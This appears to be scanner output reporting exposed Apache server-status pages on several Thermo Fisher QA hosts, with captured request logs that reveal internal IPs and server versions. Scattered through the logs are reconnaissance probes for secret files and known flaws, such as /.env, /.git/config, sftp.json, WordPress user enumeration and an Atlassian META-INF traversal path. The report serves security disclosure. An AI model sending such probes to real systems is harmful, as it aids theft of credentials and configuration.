0.00562159299400.00.095.54 10.253.106.249http/1.1 23-0233630/0/238R 0.00190122720.00.004.95 10.253.106.249http/1.1 24-0201280/0/224R 0.005620126800.00.003.14 10.253.106.249http/1.1 25-0233640/0/226R 0.00190137350.00.003.88 10.253.106.249http/1.1 26-0176190/15/238R 0.18392165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012570153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284R 0.00180489040.00.006.20 10.253.106.249http/1.1 29-0130150/17/229R 0.16562187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281_ 0.00180190930.00.004.42 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 31-0177860/3/228R 0.0056340131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20562252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1852059132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10520352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002580112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055452242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00180137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233680/0/206_ 0.00180119720.00.002.61 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0104770/20/203_ 0.01040125790.00.303.66 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 40-0121750/14/368R 0.1952180401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00180136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225037/7/207K 0.00042120356.20.014.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 43-0159970/24/311R 0.352025267660.00.947.23 10.253.106.249http/1.1 44-0141670/8/241R 0.00562207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00180170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02568134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005390188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00144184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005540118040.00.002.48 10.253.106.224http/1.1 50-0225044/4/263K 0.0000186817.90.014.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 51-0201340/0/334R 0.005550194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0352054160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00180174490.00.004.07 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 54-0233720/0/242_ 0.00180140030.00.004.35 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127ccdf9cf02
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:19 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 53 seconds Server load: 0.05 0.01 0.00 Total accesses: 63896 - Total Traffic: 396.8 MB - Total Duration: 1367528 CPU Usage: u15.46 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.4024 ms/request 56 requests currently being processed, 17 idle workers RKKK_KR__RWRRKRRWRR_RRRRRRRRRR_RRRRRR___R_KRR_RR_RKRR____R_W.KWR WWRRKRW_RR...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005630159620.00.005.57 10.253.106.224http/1.1 1-0174444/5/314K 0.00040226853.60.005.29 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 2-0233583/3/387K 0.00040185922.30.004.45 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 3-01968222830/22830/22830K 12.93101327534574.933.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/6/261_ 0.0110217070.00.094.86 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 5-01968422829/22829/22829K 13.07401344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233590/0/283R 0.00200173210.00.004.37 10.253.106.249http/1.1 7-0149550/9/328_ 0.001410205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01149186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002940182220.00.016.00 10.253.106.249http/1.1 10-0103551/13/302W 0.0700193000.70.294.61 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 11-0159470/1/273R 0.0056840377150.00.005.90 10.253.106.249http/1.1 12-0233600/0/260R 0.00200157020.00.006.11 10.253.106.249http/1.1 13-0220351/13/250K 0.38200137191.00.955.88 10.253.106.224http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 14-051340/25/317R 0.0456353179310.00.634.48 10.253.106.249http/1.1 15-0233610/0/304R 0.00190221370.00.002.52 10.253.106.249http/1.1 16-0224942/2/237W 0.0000188831.50.004.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 17-0130130/7/270R 0.0855562181540.00.203.52 10.253.106.224http/1.1 18-0233620/0/366R 0.00190233470.00.007.35 10.253.106.249http/1.1 19-0141580/18/364_ 0.01110767270.00.117.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0224950/0/225R 0.002570231340.00.003.38 10.253.106.249http/1.1 21-0201260/9/261R 0.002127169070.00.015.98 10.253.106.249http/1.1 22-0201270/1/326R 0.00562159299400.00.095.54 10.253.106.249http/1.1 23-0233630/0/238R 0.00190122720.00.004.95 10.253.106.249http/1.1 24-0201280/0/224R 0.005620126800.00.003.14 10.253.106.249http/1.1 25-0233640/0/226R 0.00190137350.00.003.88 10.253.106.249http/1.1 26-0176190/15/238R 0.18392165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012570153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284R 0.00180489040.00.006.20 10.253.106.249http/1.1 29-0130150/17/229R 0.16562187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281_ 0.00180190930.00.004.42 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 31-0177860/3/228R 0.0056340131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20562252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1852059132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10520352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002580112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055452242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00180137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233680/0/206_ 0.00180119720.00.002.61 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0104770/20/203_ 0.01040125790.00.303.66 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 40-0121750/14/368R 0.1952180401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00180136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225037/7/207K 0.00042120356.20.014.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 43-0159970/24/311R 0.352025267660.00.947.23 10.253.106.249http/1.1 44-0141670/8/241R 0.00562207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00180170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02568134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005390188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00144184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005540118040.00.002.48 10.253.106.224http/1.1 50-0225044/4/263K 0.0000186817.90.014.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 51-0201340/0/334R 0.005550194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0352054160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00180174490.00.004.07 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 54-0233720/0/242_ 0.00180140030.00.004.35 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 55-0234190/0/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cccb825b3
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 01-Feb-2023 03:18:25 EST Restart Time: Wednesday, 25-Jan-2023 12:55:48 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 14 hours 22 minutes 37 seconds Server load: 0.01 0.01 0.00 Total accesses: 208565 - Total Traffic: 2.4 GB - Total Duration: 10236031 CPU Usage: u43.99 s66.29 cu301.06 cs65.71 - .0837% CPU load .366 requests/sec - 4552 B/second - 12.2 kB/request - 49.0784 ms/request 57 requests currently being processed, 40 idle workers KK.KKKRRKR__RRKKKRRKRR_KKRKK_KKWRKKWKK_K_RKK_K_K_RK_W_R_K____W__ _K__KKRRRRR___RR_____KW___________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0232044/23/1453K 0.0314012750115.00.0941.87 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /login.action HTTP/1.1 1-0217851/16/1466K 0.0432311549934.10.1740.65 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 2-0-0/0/917. 0.00230424080.00.0015.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0135057016/57016/57016K 35.18403686286894.384.8684.86 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-0135157016/57016/57016K 33.21003504386894.584.8684.86 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0306871/4/1157K 0.0032311730876.10.0136.41 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 6-050410/0/1363R 0.004101659020.00.0024.49 10.253.106.224http/1.1 7-0239250/11/1076R 0.01380121560420.00.0522.81 10.253.106.249http/1.1 8-0322311/1/1016K 0.001381220070.70.0021.32 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 9-077700/49/1192R 0.20420171083910.01.3726.33 10.253.106.224http/1.1 10-0307030/6/1657_ 0.013802156660.00.0452.48 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 11-050460/0/1382_ 0.003501030580.00.0077.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 12-0307040/12/1213R 0.0364921818410.00.0827.70 10.253.106.249http/1.1 13-0143880/26/1174R 0.072059718590.00.4413.89 10.253.106.224http/1.1 14-0269631/4/1287K 0.01141325575.50.0236.80 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 15-0307051/2/942K 0.0032291030832.90.0122.11 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 16-0244681/2/1064K 0.0031641490663.80.0119.99 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 17-013980/0/1046R 0.0044601263240.00.0028.83 10.253.106.249http/1.1 18-013990/0/952R 0.004200820660.00.0039.12 10.253.106.224http/1.1 19-014005/9/812K 0.0132494776817.80.0310.91 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 20-0210840/49/999R 0.0864901235980.00.2326.10 10.253.106.249http/1.1 21-025810/3/959R 0.00649411135250.00.0017.27 10.253.106.249http/1.1 22-0224790/12/1344_ 0.0131141254420.00.0725.29 10.253.106.224http/1.1 23-0177503/28/1070K 0.030411098003.20.1316.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 24-0307521/1/1074K 0.0031911347894.20.0020.38 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 25-026690/0/1177R 0.0064901394090.00.0026.86 10.253.106.249http/1.1 26-014696/6/1398K 0.0314020963378.80.0828.90 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /v2/_catalog HTTP/1.1 27-030484/4/1116K 0.0090179568530.10.0319.45 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 28-0210890/17/1395_ 0.090101904050.00.1754.33 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 29-014701/4/902K 0.02327511138223.00.0524.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 30-0166776/29/1164K 0.0504216148810.40.1344.82 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 31-0307601/2/1428W 0.00001036472.90.0115.90 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 32-0210910/0/1631R 0.0038001447320.00.0033.35 10.253.106.249http/1.1 33-014711/2/1282K 0.0032262510963.60.0120.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 34-02109313/38/1563K 0.0713828407132.30.8937.01 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 35-019621/5/1304W 0.01001155726.00.1130.01 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 36-0210947/18/1199K 0.0214114112523.10.0718.36 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /about HTTP/1.1 37-0308443/9/1205K 0.021401804882.90.0423.22 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /api/search?folderIds=0 HTTP/1.1 38-0308480/7/950_ 0.003113984370.00.0431.42 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 39-0308495/5/1310K 0.002531310540218.40.0219.43 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0239270/30/1100_ 0.08113800140.00.3224.89 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 41-0240130/10/1097R 0.3851317749790.00.9833.98 10.253.106.224http/1.1 42-030671/1/1111K 0.009101030331.00.0022.55 10.253.106.224http/1.1qa1.onelambda.com:80GET / HTTP/1.1 43-0322323/6/930K 0.012191312119212.30.0220.10 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 44-0322330/0/1320_ 0.002401213260.00.0025.10 10.253.106.224http/1.1 45-0322931/1/1636K 0.00217142312658.50.0171.72 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 46-0217960/10/1253_ 0.0311021127170.00.0724.68 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-0240381/29/867K 0.04133181188557.50.1141.61 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 48-050470/0/1138_ 0.003201199110.00.0016.79 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cd88dd217
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 01-Feb-2023 03:18:24 EST Restart Time: Wednesday, 25-Jan-2023 12:55:48 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 14 hours 22 minutes 36 seconds Server load: 0.01 0.01 0.00 Total accesses: 208546 - Total Traffic: 2.4 GB - Total Duration: 10235173 CPU Usage: u43.99 s66.29 cu301.06 cs65.71 - .0837% CPU load .366 requests/sec - 4552 B/second - 12.2 kB/request - 49.0787 ms/request 57 requests currently being processed, 40 idle workers WK.KKKRRKR__RRKKKRRKRR_RKRKKKKKKRKKKWK_K_RKK_K_K_RK_K_R_K____K__ ____KKRRRRR___RR_____KK___________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0232042/21/1451W 0.030012733613.50.0941.87 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 1-0217851/16/1466K 0.0430311549934.10.1740.65 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 2-0-0/0/917. 0.00220424080.00.0015.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0135057016/57016/57016K 35.18303686286894.384.8684.86 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-0135157015/57015/57015K 33.21903504286893.084.8684.86 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0306871/4/1157K 0.0030311730876.10.0136.41 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 6-050410/0/1363R 0.004001659020.00.0024.49 10.253.106.224http/1.1 7-0239250/11/1076R 0.01379121560420.00.0522.81 10.253.106.249http/1.1 8-0322311/1/1016K 0.000381220070.70.0021.32 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 9-077700/49/1192R 0.20419171083910.01.3726.33 10.253.106.224http/1.1 10-0307030/6/1657_ 0.013702156660.00.0452.48 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 11-050460/0/1382_ 0.003401030580.00.0077.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 12-0307040/12/1213R 0.0364821818410.00.0827.70 10.253.106.249http/1.1 13-0143880/26/1174R 0.072049718590.00.4413.89 10.253.106.224http/1.1 14-0269631/4/1287K 0.01041325575.50.0236.80 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 15-0307051/2/942K 0.0030291030832.90.0122.11 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 16-0244681/2/1064K 0.0030641490663.80.0119.99 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 17-013980/0/1046R 0.0044501263240.00.0028.83 10.253.106.249http/1.1 18-013990/0/952R 0.004190820660.00.0039.12 10.253.106.224http/1.1 19-014005/9/812K 0.0130494776817.80.0310.91 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 20-0210840/49/999R 0.0864801235980.00.2326.10 10.253.106.249http/1.1 21-025810/3/959R 0.00648411135250.00.0017.27 10.253.106.249http/1.1 22-0224790/12/1344_ 0.0130141254420.00.0725.29 10.253.106.224http/1.1 23-0177500/25/1067R 0.033741096910.00.1316.46 10.253.106.249http/1.1 24-0307521/1/1074K 0.0030911347894.20.0020.38 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 25-026690/0/1177R 0.0064801394090.00.0026.86 10.253.106.249http/1.1 26-014695/5/1397K 0.030020955278.00.0828.90 10.253.106.224http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 27-030484/4/1116K 0.0089179568530.10.0319.45 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 28-0210894/15/1393K 0.0901519038471.80.1754.33 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 29-014701/4/902K 0.02307511138223.00.0524.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 30-0166774/27/1162K 0.05061613808.20.1344.82 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 31-0307601/2/1428K 0.0030451036472.90.0115.90 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 32-0210910/0/1631R 0.0037901447320.00.0033.35 10.253.106.249http/1.1 33-014711/2/1282K 0.0030262510963.60.0120.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 34-02109313/38/1563K 0.0703828407132.30.8937.01 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 35-019621/5/1304K 0.0130591155726.00.1130.01 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/uti 36-0210945/16/1197W 0.020014103416.70.0718.35 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 37-0308442/8/1204K 0.020281804062.10.0423.22 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 38-0308480/7/950_ 0.003013984370.00.0431.42 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 39-0308495/5/1310K 0.002521310540218.40.0219.43 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0239270/30/1100_ 0.08013800140.00.3224.89 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 41-0240130/10/1097R 0.3851217749790.00.9833.98 10.253.106.224http/1.1 42-030671/1/1111K 0.009001030331.00.0022.55 10.253.106.224http/1.1qa1.onelambda.com:80GET / HTTP/1.1 43-0322323/6/930K 0.012181312119212.30.0220.10 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 44-0322330/0/1320_ 0.002301213260.00.0025.10 10.253.106.224http/1.1 45-0322931/1/1636K 0.00216142312658.50.0171.72 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 46-0217960/10/1253_ 0.0301021127170.00.0724.68 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-0240381/29/867K 0.04131181188557.50.1141.61 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 48-050470/0/1138_ 0.003101199110.00.0016.79 127.0.0.1http/1.1qa1-corporate.thermofisher.co
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c19930128
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:18 EDT Restart Time: Wednesday, 19-Oct-2022 16:16:11 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 13 hours 38 minutes 7 seconds Server load: 0.01 0.03 0.03 Total accesses: 20330 - Total Traffic: 538.1 MB - Total Duration: 708999 CPU Usage: u2.58 s5.04 cu16.19 cs10.83 - .0706% CPU load .414 requests/sec - 11.2 kB/second - 27.1 kB/request - 34.8745 ms/request 56 requests currently being processed, 22 idle workers WWWRRWRWRRKRWRWRWWKRK_RWR_RR__RWRWWKRKRR__WR__KRWRW_R___KR_RR_RK RWR_WRR_______.................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0170741/1/3808W 0.0000112560.80.006.10 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 1-0183024/4/3659W 0.000074634.90.0028.04 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 2-0188090/0/115W 0.000097620.00.001.34 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-0183030/0/129R 0.00387060410.00.001.62 10.253.106.227http/1.1 4-0130260/7/191R 0.023871566990.00.063.85 10.253.106.227http/1.1 5-0188100/0/94W 0.000046670.00.000.79 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 6-0174490/4/97R 0.003872013162440.00.010.52 10.253.106.227http/1.1 7-0174505/5/93W 0.0000170145.80.0116.84 10.253.106.240http/1.1qa1.onelambda.com:80GET /s/32332e33362e3136322e3639/_/;/META-INF/maven/com.atlassia 8-0178170/1/182R 0.006921652380.02.593.04 10.253.106.227http/1.1 9-0166750/4/72R 0.013874336050.00.050.33 10.253.106.227http/1.1 10-0175685/5/140K 0.0072014109446.00.010.46 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 11-0178180/0/83R 0.00694016650.00.000.36 10.253.106.240http/1.1 12-0146977/21/108W 0.10002146518.80.560.96 10.253.106.227http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 13-0166770/151/256R 0.38694338214140.00.792.50 10.253.106.240http/1.1 14-0183042/2/221W 0.0000122892.30.001.27 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 15-0178190/4/225R 0.004972017196560.00.7487.06 10.253.106.240http/1.1 16-0188110/0/30W 0.00002660.00.000.07 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 17-01667913/16/113W 0.02101992826.30.050.94 10.253.106.227http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 18-081101434/1436/1491K 0.913065052171.42.122.71 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 19-0188130/0/96R 0.0077014580.00.004.17 10.253.106.240http/1.1 20-075101434/1438/1519K 0.976056842169.12.1332.54 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 21-0188140/0/77_ 0.00770518800.00.000.42 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 22-0188150/0/145R 0.0077037370.00.003.40 10.253.106.240http/1.1 23-0183060/1/271W 0.0000125850.00.001.24 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 24-0188160/0/81R 0.0077048360.00.000.55 10.253.106.240http/1.1 25-0188210/0/138_ 0.0076095710.00.003.57 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-0167330/7/46R 0.01692201587920.00.020.35 10.253.106.227http/1.1 27-0167340/2/37R 0.00693201559580.00.050.64 10.253.106.240http/1.1 